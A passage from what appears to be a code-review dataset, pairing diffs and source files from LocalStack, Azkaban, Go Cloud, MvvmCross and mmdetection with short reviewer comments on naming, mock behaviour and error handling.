"KINESIS_INITIALIZE_STREAMS", "TF_COMPAT_MODE", "LAMBDA_DOCKER_FLAGS", "LAMBDA_FORWARD_URL", "LAMBDA_CODE_EXTRACT_TIME", "THUNDRA_APIKEY", "THUNDRA_AGENT_JAVA_VERSION", "THUNDRA_AGENT_NODE_VERSION", "THUNDRA_AGENT_PYTHON_VERSION", "DISABLE_CORS_CHECKS", "DISABLE_CUSTOM_CORS_S3", "DISABLE_CUSTOM_CORS_APIGATEWAY", "EXTRA_CORS_ALLOWED_HEADERS", "EXTRA_CORS_EXPOSE_HEADERS", "EXTRA_CORS_ALLOWED_ORIGINS", "ENABLE_CONFIG_UPDATES", "LOCALSTACK_HTTP_PROXY", "LOCALSTACK_HTTPS_PROXY", "REQUESTS_CA_BUNDLE", "LEGACY_DOCKER_CLIENT", "EAGER_SERVICE_LOADING", "LAMBDA_STAY_OPEN_MODE", ] for key, value in six.iteritems(DEFAULT_SERVICE_PORTS): clean_key = key.upper().replace("-", "_") CONFIG_ENV_VARS += [ clean_key + "_BACKEND", clean_key + "_PORT", clean_key + "_PORT_EXTERNAL", ] def collect_config_items() -> List[Tuple[str, Any]]: """Returns a list of key-value tuples of LocalStack configuration values.""" none = object() # sentinel object # collect which keys to print keys = list() keys.extend(CONFIG_ENV_VARS) keys.append("DATA_DIR") keys.sort() values = globals() result = list() for k in keys: v = values.get(k, none) if v is none: continue result.append((k, v)) result.sort() return result def ping(host): """Returns True if host responds to a ping request""" is_windows = platform.system().lower() == "windows" ping_opts = "-n 1" if is_windows else "-c 1" args = "ping %s %s" % (ping_opts, host) return ( subprocess.call(args, shell=not is_windows, stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0 ) def in_docker(): """ Returns True if running in a docker container, else False Ref. https://docs.docker.com/config/containers/runmetrics/#control-groups """ if OVERRIDE_IN_DOCKER: return True if os.path.exists("/.dockerenv"): return True if not os.path.exists("/proc/1/cgroup"): return False try: if any( [ os.path.exists("/sys/fs/cgroup/memory/docker/"), any( [ "docker-" in file_names for file_names in os.listdir("/sys/fs/cgroup/memory/system.slice") ] ), os.path.exists("/sys/fs/cgroup/docker/"), any( [ "docker-" in file_names for file_names in os.listdir("/sys/fs/cgroup/system.slice/") ] ), ] ): return False except Exception: pass with open("/proc/1/cgroup", "rt") as ifh: content = ifh.read() if "docker" in content: return True os_hostname = socket.gethostname() if os_hostname and os_hostname in content: return True return False is_in_docker = in_docker() is_in_linux = is_linux() # determine IP of Docker bridge if not DOCKER_BRIDGE_IP: DOCKER_BRIDGE_IP = "172.17.0.1" if is_in_docker: candidates = (DOCKER_BRIDGE_IP, "172.18.0.1") for ip in candidates: if ping(ip): DOCKER_BRIDGE_IP = ip break # determine route to Docker host from container try: DOCKER_HOST_FROM_CONTAINER = DOCKER_BRIDGE_IP if not is_in_docker and not is_in_linux: # If we're running outside docker, and would like the Lambda containers to be able # to access services running on the local machine, set DOCKER_HOST_FROM_CONTAINER accordingly if LOCALSTACK_HOSTNAME == LOCALHOST: DOCKER_HOST_FROM_CONTAINER = "host.docker.internal" # update LOCALSTACK_HOSTNAME if host.docker.internal is available if is_in_docker: DOCKER_HOST_FROM_CONTAINER = socket.gethostbyname("host.docker.internal") if LOCALSTACK_HOSTNAME == DOCKER_BRIDGE_IP: LOCALSTACK_HOSTNAME = DOCKER_HOST_FROM_CONTAINER except socket.error: pass # make sure we default to LAMBDA_REMOTE_DOCKER=true if running in Docker if is_in_docker and not os.environ.get("LAMBDA_REMOTE_DOCKER", "").strip(): LAMBDA_REMOTE_DOCKER = True # whether lambdas should use stay open mode if executed in "docker-reuse" executor LAMBDA_STAY_OPEN_MODE = is_in_docker and is_env_not_false("LAMBDA_STAY_OPEN_MODE") # set variables no_proxy, i.e., run internal service calls directly no_proxy = ",".join(set((LOCALSTACK_HOSTNAME, LOCALHOST, LOCALHOST_IP, "[::1]"))) if os.environ.get("no_proxy"): os.environ["no_proxy"] += "," + no_proxy elif os.environ.get("NO_PROXY"): os.environ["NO_PROXY"] += "," + no_proxy else: os.environ["no_proxy"] = no_proxy # additional CLI commands, can be set by plugins CLI_COMMANDS = {} # set of valid regions VALID_PARTITIONS = set(Session().get_available_partitions()) VALID_REGIONS = set() for partition in VALID_PARTITIONS: for region in Session().get_available_regions("sns", partition): VALID_REGIONS.add(region) def parse_service_ports() -> Dict[str, int]: """Parses the environment variable $SERVICES with a comma-separated list of services and (optional) ports they should run on: 'service1:port1,service2,service3:port3'""" service_ports = os.environ.get("SERVICES", "").strip() if not service_ports: return DEFAULT_SERVICE_PORTS result = {} for service_port in re.split(r"\s*,\s*", service_ports): parts = re.split(r"[:=]", service_port) service = parts[0] key_upper = service.upper().replace("-", "_") port_env_name = "%s_PORT" % key_upper # (1) set default port number port_number = DEFAULT_SERVICE_PORTS.get(service) # (2) set port number from <SERVICE>_PORT environment, if present if os.environ.get(port_env_name): port_number = os.environ.get(port_env_name) # (3) set port number from <service>:<port> portion in $SERVICES, if present if len(parts) > 1: port_number = int(parts[-1]) # (4) try to parse as int, fall back to 0 (invalid port) try: port_number = int(port_number) except Exception: port_number = 0 result[service] = port_number return result # TODO: we need to investigate the performance impact of this def populate_configs(service_ports=None): global SERVICE_PORTS, CONFIG_ENV_VARS SERVICE_PORTS = service_ports or parse_service_ports() globs = globals() protocol = get_protocol() # define service ports and URLs as environment variables for key, value in six.iteritems(DEFAULT_SERVICE_PORTS): key_upper = key.upper().replace("-", "_") # define PORT_* variables with actual service ports as per configuration port_var_name = "PORT_%s" % key_upper port_number = service_port(key) globs[port_var_name] = port_number url = "%s://%s:%s" % (protocol, LOCALSTACK_HOSTNAME, port_number) # define TEST_*_URL variables with mock service endpoints url_key = "TEST_%s_URL" % key_upper # allow overwriting TEST_*_URL from user-defined environment variables existing = os.environ.get(url_key) url = existing or url # set global variable globs[url_key] = url # expose HOST_*_URL variables as environment variables os.environ[url_key] = url # expose LOCALSTACK_HOSTNAME as env. variable os.environ["LOCALSTACK_HOSTNAME"] = LOCALSTACK_HOSTNAME # create variable aliases prefixed with LOCALSTACK_ (except LOCALSTACK_HOSTNAME) CONFIG_ENV_VARS += [ "LOCALSTACK_" + v for v in CONFIG_ENV_VARS if not v.startswith("LOCALSTACK_") ] CONFIG_ENV_VARS = list(set(CONFIG_ENV_VARS)) def service_port(service_key): if FORWARD_EDGE_INMEM: if service_key == "elasticsearch": # TODO Elasticsearch domains are a special case - we do not want to route them through # the edge service, as that would require too many route mappings. In the future, we # should integrate them with the port range for external services (4510-4530) return SERVICE_PORTS.get(service_key, 0) return get_edge_port_http() return SERVICE_PORTS.get(service_key, 0) def get_protocol(): return "https" if USE_SSL else "http" def external_service_url(service_key, host=None): host = host or HOSTNAME_EXTERNAL return "%s://%s:%s" % (get_protocol(), host, service_port(service_key)) def get_edge_port_http(): return EDGE_PORT_HTTP or EDGE_PORT def get_edge_url(localstack_hostname=None, protocol=None): port = get_edge_port_http() protocol = protocol or get_protocol() localstack_hostname = localstack_hostname or LOCALSTACK_HOSTNAME return "%s://%s:%s" % (protocol, localstack_hostname, port) # initialize config values populate_configs() # set log levels if DEBUG: logging.getLogger("").setLevel(logging.DEBUG) logging.getLogger("localstack").setLevel(logging.DEBUG) if LS_LOG in TRACE_LOG_LEVELS: load_end_time = time.time() LOG = logging.getLogger(__name__) LOG.debug( "Initializing the configuration took %s ms" % int((load_end_time - load_start_time) * 1000) ) class ServiceProviderConfig(Mapping[str, str]): _provider_config: Dict[str, str] default_value: str def __init__(self, default_value: str): self._provider_config = dict() self.default_value = default_value def get_provider(self, service: str) -> str: return self._provider_config.get(service, self.default_value) def set_provider_if_not_exists(self, service: str, provider: str) -> None: if service not in self._provider_config: self._provider_config[service] = provider def set_provider(self, service: str, provider: str): self._provider_config[service] = provider def bulk_set_provider_if_not_exists(self, services: List[str], provider: str): for service in services: self.set_provider_if_not_exists(service, provider) def __getitem__(self, item): return self.get_provider(item) def __setitem__(self, key, value): self.set_provider(key, value) def __len__(self): return len(self._provider_config) def __iter__(self): return self._provider_config.__iter__() SERVICE_PROVIDER_CONFIG = ServiceProviderConfig("default") for key, value in os.environ.items(): if key.startswith("PROVIDER_OVERRIDE_"): SERVICE_PROVIDER_CONFIG.set_provider(key.lstrip("PROVIDER_OVERRIDE_").lower(), value) # initialize directories if is_in_docker: dirs = Directories.for_container() else: dirs = Directories.from_config() dirs.mkdirs() # TODO: remove deprecation warning with next release for path in [dirs.config, os.path.join(dirs.tmp, ".localstack")]: if path and os.path.isfile(path): print( f"warning: the config file .localstack is deprecated and no longer used, " f"please remove it by running rm {path}" )
1
13,969
i'm not sure about htis naming here. both the word partition and adjustment are very ambiguous and it's not clear what it does. i would maybe go for something less generic and more concrete like `GOV_CLOUD_SUPPORT`
localstack-localstack
py
@@ -78,7 +78,13 @@ public class MockExecutorLoader implements ExecutorLoader { @Override public Map<Integer, Pair<ExecutionReference, ExecutableFlow>> fetchUnfinishedFlows() throws ExecutorManagerException { - return new ConcurrentHashMap<>(); + return this.activeFlows; + } + + @Override + public Map<Integer, Pair<ExecutionReference, ExecutableFlow>> fetchUnfinishedExecutions() + throws ExecutorManagerException { + return this.activeFlows; } @Override
1
/* * Copyright 2014 LinkedIn Corp. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ package azkaban.executor; import azkaban.executor.ExecutorLogEvent.EventType; import azkaban.utils.FileIOUtils.LogData; import azkaban.utils.Pair; import azkaban.utils.Props; import java.io.File; import java.io.IOException; import java.time.Duration; import java.util.ArrayList; import java.util.Date; import java.util.List; import java.util.Map; import java.util.concurrent.ConcurrentHashMap; import org.apache.commons.io.FileUtils; import org.apache.log4j.Logger; /** * Used in unit tests to mock the "DB layer" (the real implementation is JdbcExecutorLoader). * Captures status updates of jobs and flows (in memory) so that they can be checked in tests. */ public class MockExecutorLoader implements ExecutorLoader { private static final Logger logger = Logger.getLogger(MockExecutorLoader.class); Map<Integer, Integer> executionExecutorMapping = new ConcurrentHashMap<>(); Map<Integer, ExecutableFlow> flows = new ConcurrentHashMap<>(); Map<String, ExecutableNode> nodes = new ConcurrentHashMap<>(); Map<Integer, ExecutionReference> refs = new ConcurrentHashMap<>(); int flowUpdateCount = 0; Map<String, Integer> jobUpdateCount = new ConcurrentHashMap<>(); Map<Integer, Pair<ExecutionReference, ExecutableFlow>> activeFlows = new ConcurrentHashMap<>(); List<Executor> executors = new ArrayList<>(); int executorIdCounter = 0; Map<Integer, ArrayList<ExecutorLogEvent>> executorEvents = new ConcurrentHashMap<>(); @Override public void uploadExecutableFlow(final ExecutableFlow flow) throws ExecutorManagerException { // Clone the flow node to mimick how it would be saved in DB. // If we would keep a handle to the original flow node, we would also see any changes made after // this method was called. We must only store a snapshot of the current state. // Also to avoid modifying statuses of the original job nodes in this.updateExecutableFlow() final ExecutableFlow exFlow = ExecutableFlow.createExecutableFlowFromObject(flow.toObject()); this.flows.put(flow.getExecutionId(), exFlow); this.flowUpdateCount++; } @Override public ExecutableFlow fetchExecutableFlow(final int execId) throws ExecutorManagerException { final ExecutableFlow flow = this.flows.get(execId); return ExecutableFlow.createExecutableFlowFromObject(flow.toObject()); } @Override public Map<Integer, Pair<ExecutionReference, ExecutableFlow>> fetchActiveFlows() throws ExecutorManagerException { return this.activeFlows; } @Override public Map<Integer, Pair<ExecutionReference, ExecutableFlow>> fetchUnfinishedFlows() throws ExecutorManagerException { return new ConcurrentHashMap<>(); } @Override public Pair<ExecutionReference, ExecutableFlow> fetchActiveFlowByExecId(final int execId) { return new Pair<>(null, null); } @Override public List<ExecutableFlow> fetchFlowHistory(final int projectId, final String flowId, final int skip, final int num) throws ExecutorManagerException { return null; } @Override public void addActiveExecutableReference(final ExecutionReference ref) throws ExecutorManagerException { this.refs.put(ref.getExecId(), ref); } @Override public void removeActiveExecutableReference(final int execId) throws ExecutorManagerException { this.refs.remove(execId); } @Override public void uploadLogFile(final int execId, final String name, final int attempt, final File... files) throws ExecutorManagerException { for (final File file : files) { try { final String logs = FileUtils.readFileToString(file, "UTF-8"); logger.info("Uploaded log for [" + name + "]:[" + execId + "]:\n" + logs); } catch (final IOException e) { throw new RuntimeException(e); } } } @Override public void updateExecutableFlow(final ExecutableFlow flow) throws ExecutorManagerException { final ExecutableFlow toUpdate = this.flows.get(flow.getExecutionId()); toUpdate.applyUpdateObject(flow.toUpdateObject(0)); this.flowUpdateCount++; } @Override public void uploadExecutableNode(final ExecutableNode node, final Props inputParams) throws ExecutorManagerException { // Clone the job node to mimick how it would be saved in DB. // If we would keep a handle to the original job node, we would also see any changes made after // this method was called. We must only store a snapshot of the current state. // Also to avoid modifying statuses of the original job nodes in this.updateExecutableNode() final ExecutableNode exNode = new ExecutableNode(); exNode.fillExecutableFromMapObject(node.toObject()); this.nodes.put(node.getId(), exNode); this.jobUpdateCount.put(node.getId(), 1); } @Override public void updateExecutableNode(final ExecutableNode node) throws ExecutorManagerException { final ExecutableNode foundNode = this.nodes.get(node.getId()); foundNode.setEndTime(node.getEndTime()); foundNode.setStartTime(node.getStartTime()); foundNode.setStatus(node.getStatus()); foundNode.setUpdateTime(node.getUpdateTime()); Integer value = this.jobUpdateCount.get(node.getId()); if (value == null) { throw new ExecutorManagerException("The node has not been uploaded"); } else { this.jobUpdateCount.put(node.getId(), ++value); } this.flowUpdateCount++; } @Override public int fetchNumExecutableFlows(final int projectId, final String flowId) throws ExecutorManagerException { return 0; } @Override public int fetchNumExecutableFlows() throws ExecutorManagerException { // TODO Auto-generated method stub return 0; } public Integer getNodeUpdateCount(final String jobId) { return this.jobUpdateCount.get(jobId); } @Override public ExecutableJobInfo fetchJobInfo(final int execId, final String jobId, final int attempt) throws ExecutorManagerException { // TODO Auto-generated method stub return null; } @Override public boolean updateExecutableReference(final int execId, final long updateTime) throws ExecutorManagerException { // TODO Auto-generated method stub return true; } @Override public LogData fetchLogs(final int execId, final String name, final int attempt, final int startByte, final int endByte) throws ExecutorManagerException { // TODO Auto-generated method stub return null; } @Override public List<ExecutableFlow> fetchFlowHistory(final int skip, final int num) throws ExecutorManagerException { // TODO Auto-generated method stub return null; } @Override public List<ExecutableFlow> fetchFlowHistory(final String projectContains, final String flowContains, final String userNameContains, final int status, final long startData, final long endData, final int skip, final int num) throws ExecutorManagerException { // TODO Auto-generated method stub return null; } @Override public List<ExecutableFlow> fetchFlowHistory(final int projectId, final String flowId, final long startTime) throws ExecutorManagerException { return new ArrayList<>(); } @Override public List<ExecutableJobInfo> fetchJobHistory(final int projectId, final String jobId, final int skip, final int size) throws ExecutorManagerException { // TODO Auto-generated method stub return null; } @Override public int fetchNumExecutableNodes(final int projectId, final String jobId) throws ExecutorManagerException { // TODO Auto-generated method stub return 0; } @Override public Props fetchExecutionJobInputProps(final int execId, final String jobId) throws ExecutorManagerException { // TODO Auto-generated method stub return null; } @Override public Props fetchExecutionJobOutputProps(final int execId, final String jobId) throws ExecutorManagerException { // TODO Auto-generated method stub return null; } @Override public Pair<Props, Props> fetchExecutionJobProps(final int execId, final String jobId) throws ExecutorManagerException { // TODO Auto-generated method stub return null; } @Override public List<ExecutableJobInfo> fetchJobInfoAttempts(final int execId, final String jobId) throws ExecutorManagerException { // TODO Auto-generated method stub return null; } @Override public int removeExecutionLogsByTime(final long millis) throws ExecutorManagerException { // TODO Auto-generated method stub return 0; } @Override public List<ExecutableFlow> fetchFlowHistory(final int projectId, final String flowId, final int skip, final int num, final Status status) throws ExecutorManagerException { // TODO Auto-generated method stub return null; } @Override public List<Object> fetchAttachments(final int execId, final String name, final int attempt) throws ExecutorManagerException { // TODO Auto-generated method stub return null; } @Override public void uploadAttachmentFile(final ExecutableNode node, final File file) throws ExecutorManagerException { // TODO Auto-generated method stub } @Override public List<Executor> fetchActiveExecutors() throws ExecutorManagerException { final List<Executor> activeExecutors = new ArrayList<>(); for (final Executor executor : this.executors) { if (executor.isActive()) { activeExecutors.add(executor); } } return activeExecutors; } @Override public Executor fetchExecutor(final String host, final int port) throws ExecutorManagerException { for (final Executor executor : this.executors) { if (executor.getHost().equals(host) && executor.getPort() == port) { return executor; } } return null; } @Override public Executor fetchExecutor(final int executorId) throws ExecutorManagerException { for (final Executor executor : this.executors) { if (executor.getId() == executorId) { return executor; } } return null; } @Override public Executor addExecutor(final String host, final int port) throws ExecutorManagerException { Executor executor = null; if (fetchExecutor(host, port) == null) { this.executorIdCounter++; executor = new Executor(this.executorIdCounter, host, port, true); this.executors.add(executor); } return executor; } @Override public void removeExecutor(final String host, final int port) throws ExecutorManagerException { final Executor executor = fetchExecutor(host, port); if (executor != null) { this.executorIdCounter--; this.executors.remove(executor); } } @Override public void postExecutorEvent(final Executor executor, final EventType type, final String user, final String message) throws ExecutorManagerException { final ExecutorLogEvent event = new ExecutorLogEvent(executor.getId(), user, new Date(), type, message); if (!this.executorEvents.containsKey(executor.getId())) { this.executorEvents.put(executor.getId(), new ArrayList<>()); } this.executorEvents.get(executor.getId()).add(event); } @Override public List<ExecutorLogEvent> getExecutorEvents(final Executor executor, final int num, final int skip) throws ExecutorManagerException { if (!this.executorEvents.containsKey(executor.getId())) { final List<ExecutorLogEvent> events = this.executorEvents.get(executor.getId()); return events.subList(skip, Math.min(num + skip - 1, events.size() - 1)); } return null; } @Override public void updateExecutor(final Executor executor) throws ExecutorManagerException { final Executor oldExecutor = fetchExecutor(executor.getId()); this.executors.remove(oldExecutor); this.executors.add(executor); } @Override public List<Executor> fetchAllExecutors() throws ExecutorManagerException { return this.executors; } @Override public void assignExecutor(final int executorId, final int execId) throws ExecutorManagerException { final ExecutionReference ref = this.refs.get(execId); ref.setExecutor(fetchExecutor(executorId)); this.executionExecutorMapping.put(execId, executorId); } @Override public Executor fetchExecutorByExecutionId(final int execId) throws ExecutorManagerException { if (this.executionExecutorMapping.containsKey(execId)) { return fetchExecutor(this.executionExecutorMapping.get(execId)); } else { throw new ExecutorManagerException( "Failed to find executor with execution : " + execId); } } @Override public List<Pair<ExecutionReference, ExecutableFlow>> fetchQueuedFlows() throws ExecutorManagerException { final List<Pair<ExecutionReference, ExecutableFlow>> queuedFlows = new ArrayList<>(); for (final int execId : this.refs.keySet()) { if (!this.executionExecutorMapping.containsKey(execId)) { queuedFlows.add(new Pair<>(this.refs .get(execId), this.flows.get(execId))); } } return queuedFlows; } @Override public void unassignExecutor(final int executionId) throws ExecutorManagerException { this.executionExecutorMapping.remove(executionId); } @Override public List<ExecutableFlow> fetchRecentlyFinishedFlows(final Duration maxAge) throws ExecutorManagerException { return new ArrayList<>(); } @Override public int selectAndUpdateExecution(final int executorId) throws ExecutorManagerException { return 1; } }
1
17,114
unfinishedFlows might not be the same as activeFlows. Will it cause confusion here?
azkaban-azkaban
java
@@ -73,3 +73,18 @@ func Example() { cfg := snapshot.Value.(MyConfig) _ = cfg } + +func Example_openVariable() { + // OpenVariable creates a *runtimevar.Variable from a URL. + ctx := context.Background() + v, err := runtimevar.OpenVariable(ctx, "runtimeconfigurator://myproject/myconfigid/myvar?decoder=string") + if err != nil { + log.Fatal(err) + } + + snapshot, err := v.Watch(ctx) + if err != nil { + log.Fatal(err) + } + _, _ = snapshot, err +}
1
// Copyright 2018 The Go Cloud Development Kit Authors // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // https://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package runtimeconfigurator_test import ( "context" "log" "gocloud.dev/gcp" "gocloud.dev/runtimevar" "gocloud.dev/runtimevar/runtimeconfigurator" ) // MyConfig is a sample configuration struct. type MyConfig struct { Server string Port int } func Example() { // Your GCP credentials. // See https://cloud.google.com/docs/authentication/production // for more info on alternatives. ctx := context.Background() creds, err := gcp.DefaultCredentials(ctx) if err != nil { log.Fatal(err) } // Connect to the Runtime Configurator service. client, cleanup, err := runtimeconfigurator.Dial(ctx, creds.TokenSource) if err != nil { log.Fatal(err) } defer cleanup() // Create a decoder for decoding JSON strings into MyConfig. decoder := runtimevar.NewDecoder(MyConfig{}, runtimevar.JSONDecode) // Fill these in with the values from the Cloud Console. // For this example, the GCP Cloud Runtime Configurator variable being // referenced should have a JSON string that decodes into MyConfig. name := runtimeconfigurator.ResourceName{ ProjectID: "gcp-project-id", Config: "cfg-name", Variable: "cfg-variable-name", } // Construct a *runtimevar.Variable that watches the variable. v, err := runtimeconfigurator.NewVariable(client, name, decoder, nil) if err != nil { log.Fatal(err) } defer v.Close() // We can now read the current value of the variable from v. snapshot, err := v.Watch(context.Background()) if err != nil { log.Fatal(err) } cfg := snapshot.Value.(MyConfig) _ = cfg }
1
15,234
Same, remove the error handling.
google-go-cloud
go
@@ -1,14 +1,16 @@ -// IMvxAppStart.cs +// IMvxAppStart.cs // MvvmCross is licensed using Microsoft Public License (Ms-PL) // Contributions and inspirations noted in readme.md and license.txt // // Project Lead - Stuart Lodge, @slodge, [email protected] +using System.Threading.Tasks; + namespace MvvmCross.Core.ViewModels { public interface IMvxAppStart { - void Start(object hint = null); + Task Start(object hint = null); } }
1
// IMvxAppStart.cs // MvvmCross is licensed using Microsoft Public License (Ms-PL) // Contributions and inspirations noted in readme.md and license.txt // // Project Lead - Stuart Lodge, @slodge, [email protected] namespace MvvmCross.Core.ViewModels { public interface IMvxAppStart { void Start(object hint = null); } }
1
13,533
We should not change this at this time.
MvvmCross-MvvmCross
.cs
@@ -242,8 +242,8 @@ class AnchorGenerator(object): Args: base_anchors (torch.Tensor): The base anchors of a feature grid. featmap_size (tuple[int]): Size of the feature maps. - stride (tuple[int], optional): Stride of the feature map. - Defaults to (16, 16). + stride (tuple[int], optional): Stride of the feature map in order + (w, h). Defaults to (16, 16). device (str, optional): Device the tensor will be put on. Defaults to 'cuda'.
1
import mmcv import numpy as np import torch from torch.nn.modules.utils import _pair from .builder import ANCHOR_GENERATORS @ANCHOR_GENERATORS.register_module() class AnchorGenerator(object): """Standard anchor generator for 2D anchor-based detectors. Args: strides (list[int] | list[tuple[int, int]]): Strides of anchors in multiple feature levels. ratios (list[float]): The list of ratios between the height and width of anchors in a single level. scales (list[int] | None): Anchor scales for anchors in a single level. It cannot be set at the same time if `octave_base_scale` and `scales_per_octave` are set. base_sizes (list[int] | None): The basic sizes of anchors in multiple levels. If None is given, strides will be used as base_sizes. (If strides are non square, the shortest stride is taken.) scale_major (bool): Whether to multiply scales first when generating base anchors. If true, the anchors in the same row will have the same scales. By default it is True in V2.0 octave_base_scale (int): The base scale of octave. scales_per_octave (int): Number of scales for each octave. `octave_base_scale` and `scales_per_octave` are usually used in retinanet and the `scales` should be None when they are set. centers (list[tuple[float, float]] | None): The centers of the anchor relative to the feature grid center in multiple feature levels. By default it is set to be None and not used. If a list of tuple of float is given, they will be used to shift the centers of anchors. center_offset (float): The offset of center in proportion to anchors' width and height. By default it is 0 in V2.0. Examples: >>> from mmdet.core import AnchorGenerator >>> self = AnchorGenerator([16], [1.], [1.], [9]) >>> all_anchors = self.grid_anchors([(2, 2)], device='cpu') >>> print(all_anchors) [tensor([[-4.5000, -4.5000, 4.5000, 4.5000], [11.5000, -4.5000, 20.5000, 4.5000], [-4.5000, 11.5000, 4.5000, 20.5000], [11.5000, 11.5000, 20.5000, 20.5000]])] >>> self = AnchorGenerator([16, 32], [1.], [1.], [9, 18]) >>> all_anchors = self.grid_anchors([(2, 2), (1, 1)], device='cpu') >>> print(all_anchors) [tensor([[-4.5000, -4.5000, 4.5000, 4.5000], [11.5000, -4.5000, 20.5000, 4.5000], [-4.5000, 11.5000, 4.5000, 20.5000], [11.5000, 11.5000, 20.5000, 20.5000]]), \ tensor([[-9., -9., 9., 9.]])] """ def __init__(self, strides, ratios, scales=None, base_sizes=None, scale_major=True, octave_base_scale=None, scales_per_octave=None, centers=None, center_offset=0.): # check center and center_offset if center_offset != 0: assert centers is None, 'center cannot be set when center_offset' \ f'!=0, {centers} is given.' if not (0 <= center_offset <= 1): raise ValueError('center_offset should be in range [0, 1], ' f'{center_offset} is given.') if centers is not None: assert len(centers) == len(strides), \ 'The number of strides should be the same as centers, got ' \ f'{strides} and {centers}' # calculate base sizes of anchors self.strides = [_pair(stride) for stride in strides] self.base_sizes = [min(stride) for stride in self.strides ] if base_sizes is None else base_sizes assert len(self.base_sizes) == len(self.strides), \ 'The number of strides should be the same as base sizes, got ' \ f'{self.strides} and {self.base_sizes}' # calculate scales of anchors assert ((octave_base_scale is not None and scales_per_octave is not None) ^ (scales is not None)), \ 'scales and octave_base_scale with scales_per_octave cannot' \ ' be set at the same time' if scales is not None: self.scales = torch.Tensor(scales) elif octave_base_scale is not None and scales_per_octave is not None: octave_scales = np.array( [2**(i / scales_per_octave) for i in range(scales_per_octave)]) scales = octave_scales * octave_base_scale self.scales = torch.Tensor(scales) else: raise ValueError('Either scales or octave_base_scale with ' 'scales_per_octave should be set') self.octave_base_scale = octave_base_scale self.scales_per_octave = scales_per_octave self.ratios = torch.Tensor(ratios) self.scale_major = scale_major self.centers = centers self.center_offset = center_offset self.base_anchors = self.gen_base_anchors() @property def num_base_anchors(self): """list[int]: total number of base anchors in a feature grid""" return [base_anchors.size(0) for base_anchors in self.base_anchors] @property def num_levels(self): """int: number of feature levels that the generator will be applied""" return len(self.strides) def gen_base_anchors(self): """Generate base anchors. Returns: list(torch.Tensor): Base anchors of a feature grid in multiple \ feature levels. """ multi_level_base_anchors = [] for i, base_size in enumerate(self.base_sizes): center = None if self.centers is not None: center = self.centers[i] multi_level_base_anchors.append( self.gen_single_level_base_anchors( base_size, scales=self.scales, ratios=self.ratios, center=center)) return multi_level_base_anchors def gen_single_level_base_anchors(self, base_size, scales, ratios, center=None): """Generate base anchors of a single level. Args: base_size (int | float): Basic size of an anchor. scales (torch.Tensor): Scales of the anchor. ratios (torch.Tensor): The ratio between between the height and width of anchors in a single level. center (tuple[float], optional): The center of the base anchor related to a single feature grid. Defaults to None. Returns: torch.Tensor: Anchors in a single-level feature maps. """ w = base_size h = base_size if center is None: x_center = self.center_offset * w y_center = self.center_offset * h else: x_center, y_center = center h_ratios = torch.sqrt(ratios) w_ratios = 1 / h_ratios if self.scale_major: ws = (w * w_ratios[:, None] * scales[None, :]).view(-1) hs = (h * h_ratios[:, None] * scales[None, :]).view(-1) else: ws = (w * scales[:, None] * w_ratios[None, :]).view(-1) hs = (h * scales[:, None] * h_ratios[None, :]).view(-1) # use float anchor and the anchor's center is aligned with the # pixel center base_anchors = [ x_center - 0.5 * ws, y_center - 0.5 * hs, x_center + 0.5 * ws, y_center + 0.5 * hs ] base_anchors = torch.stack(base_anchors, dim=-1) return base_anchors def _meshgrid(self, x, y, row_major=True): """Generate mesh grid of x and y. Args: x (torch.Tensor): Grids of x dimension. y (torch.Tensor): Grids of y dimension. row_major (bool, optional): Whether to return y grids first. Defaults to True. Returns: tuple[torch.Tensor]: The mesh grids of x and y. """ xx = x.repeat(len(y)) yy = y.view(-1, 1).repeat(1, len(x)).view(-1) if row_major: return xx, yy else: return yy, xx def grid_anchors(self, featmap_sizes, device='cuda'): """Generate grid anchors in multiple feature levels. Args: featmap_sizes (list[tuple]): List of feature map sizes in multiple feature levels. device (str): Device where the anchors will be put on. Return: list[torch.Tensor]: Anchors in multiple feature levels. \ The sizes of each tensor should be [N, 4], where \ N = width * height * num_base_anchors, width and height \ are the sizes of the corresponding feature level, \ num_base_anchors is the number of anchors for that level. """ assert self.num_levels == len(featmap_sizes) multi_level_anchors = [] for i in range(self.num_levels): anchors = self.single_level_grid_anchors( self.base_anchors[i].to(device), featmap_sizes[i], self.strides[i], device=device) multi_level_anchors.append(anchors) return multi_level_anchors def single_level_grid_anchors(self, base_anchors, featmap_size, stride=(16, 16), device='cuda'): """Generate grid anchors of a single level. Note: This function is usually called by method ``self.grid_anchors``. Args: base_anchors (torch.Tensor): The base anchors of a feature grid. featmap_size (tuple[int]): Size of the feature maps. stride (tuple[int], optional): Stride of the feature map. Defaults to (16, 16). device (str, optional): Device the tensor will be put on. Defaults to 'cuda'. Returns: torch.Tensor: Anchors in the overall feature maps. """ feat_h, feat_w = featmap_size # convert Tensor to int, so that we can covert to ONNX correctlly feat_h = int(feat_h) feat_w = int(feat_w) shift_x = torch.arange(0, feat_w, device=device) * stride[0] shift_y = torch.arange(0, feat_h, device=device) * stride[1] shift_xx, shift_yy = self._meshgrid(shift_x, shift_y) shifts = torch.stack([shift_xx, shift_yy, shift_xx, shift_yy], dim=-1) shifts = shifts.type_as(base_anchors) # first feat_w elements correspond to the first row of shifts # add A anchors (1, A, 4) to K shifts (K, 1, 4) to get # shifted anchors (K, A, 4), reshape to (K*A, 4) all_anchors = base_anchors[None, :, :] + shifts[:, None, :] all_anchors = all_anchors.view(-1, 4) # first A rows correspond to A anchors of (0, 0) in feature map, # then (0, 1), (0, 2), ... return all_anchors def valid_flags(self, featmap_sizes, pad_shape, device='cuda'): """Generate valid flags of anchors in multiple feature levels. Args: featmap_sizes (list(tuple)): List of feature map sizes in multiple feature levels. pad_shape (tuple): The padded shape of the image. device (str): Device where the anchors will be put on. Return: list(torch.Tensor): Valid flags of anchors in multiple levels. """ assert self.num_levels == len(featmap_sizes) multi_level_flags = [] for i in range(self.num_levels): anchor_stride = self.strides[i] feat_h, feat_w = featmap_sizes[i] h, w = pad_shape[:2] valid_feat_h = 